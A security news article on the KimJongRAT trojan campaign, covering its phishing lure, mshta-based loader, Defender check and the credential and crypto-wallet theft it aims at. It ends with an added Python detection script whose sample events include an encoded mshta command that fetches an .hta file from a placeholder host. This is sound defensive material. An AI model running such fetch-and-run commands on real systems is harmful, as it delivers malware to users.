KimJongRAT Attacking Windows Users via Weaponized .hta Files to Steal Logins

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A new remote access trojan dubbed KimJongRAT has surfaced, posing a severe threat to Windows users.

This sophisticated malware is believed to be orchestrated by the Kimsuky group, a threat actor with alleged state backing.

The campaign typically begins with a phishing email containing a deceptive archive named National Tax Notice, which lures unsuspecting victims into initiating the infection chain.

Upon opening the malicious archive, users are presented with a shortcut file disguised as a legitimate PDF document.

Tax notice.pdf (Source – Alyac)

When executed, this shortcut file triggers a hidden command that decodes a Base64 URL and abuses the legitimate Microsoft HTML Application utility to contact a remote server.

This process stealthily downloads an additional payload known as tax.hta, effectively bypassing standard security checks.

Alyac security analysts identified that this loader script is implemented in VBScript and employs clever evasion techniques.

The malware attempts to evade detection by utilizing legitimate services like Google Drive to host its malicious components.

Once active, the loader retrieves both decoy documents to trick the user and the actual malicious binaries required for the next stage of the attack.

Exfiltration of sensitive data

The primary objective of this campaign is the exfiltration of sensitive personal and financial data.

The malware targets a wide array of information, including system details, browser storage data, and encryption keys.

It specifically hunts for cryptocurrency wallet information and credentials for communication platforms like Telegram and Discord, making it a highly dangerous tool for identity theft and financial fraud.

The most notable aspect of KimJongRAT is its ability to adapt its behavior based on the target environment’s security posture.

The malware executes a specific VBScript command to check the status of Windows Defender before proceeding.

It uses the code snippet Set exec = oShell.Exec(ss) followed by If InStr(output, "STOPPED") > 0 Then to determine if the security service is active.

If Windows Defender is disabled, the malware downloads a file named v3.log, which executes the primary payload.

Conversely, if security is active, it retrieves an alternative file called pipe.log to circumvent detection.

Regardless of the path taken, the malware establishes persistence by registering itself in the system registry, ensuring it runs automatically to transmit stolen data periodically.
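As an added illustration (not code from the article or the Alyac analysis), the following Python flags the two process-creation patterns described above in constructed sample events: a command line that hands mshta.exe a Base64-encoded URL, and a script host querying the state of the Windows Defender service. The sc.exe query form, the sample events and the example.invalid URL are assumptions.

```python
import base64
import binascii
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Constructed sample process-creation events, not real telemetry:
# (parent image, image, command line). The first mirrors the lure chain
# above (mshta.exe handed a Base64 URL); the second is the assumed shape of
# the Defender status check (a script host querying the WinDefend service).
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe",
     "cmd.exe /c mshta.exe aHR0cDovL2V4YW1wbGUuaW52YWxpZC90YXguaHRh"),
    ("mshta.exe", "sc.exe", "sc query WinDefend"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\user\\notes.txt"),
]

def decoded_urls(cmdline):
    """Return http(s) URLs recovered from Base64 tokens in a command line."""
    urls = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64, or not printable text
        if text.lower().startswith(("http://", "https://")):
            urls.append(text)
    return urls

def classify(event):
    """Return alert tags for one (parent, image, cmdline) event."""
    parent, image, cmdline = event
    parent, image, lowered = parent.lower(), image.lower(), cmdline.lower()
    tags = []
    # mshta.exe launched with a hidden (Base64-encoded) remote URL
    if (image == "mshta.exe" or "mshta.exe" in lowered) and decoded_urls(cmdline):
        tags.append("mshta_base64_url")
    # script host checking whether the Defender service is running
    if parent in SCRIPT_HOSTS and image == "sc.exe" and "windefend" in lowered:
        tags.append("defender_status_probe")
    return tags

def scan(events):
    """Return (image, tags) for every event that raised at least one tag."""
    return [(e[1], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for image, tags in scan(SAMPLE_EVENTS):
        print(image, tags)
```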

List of cryptocurrency wallets hijacked by malware (Source – Alyac)

While the list of cryptocurrency wallets hijacked by the malware shows the breadth of targeted applications, it also underscores the specific financial intent behind this tailored threat.
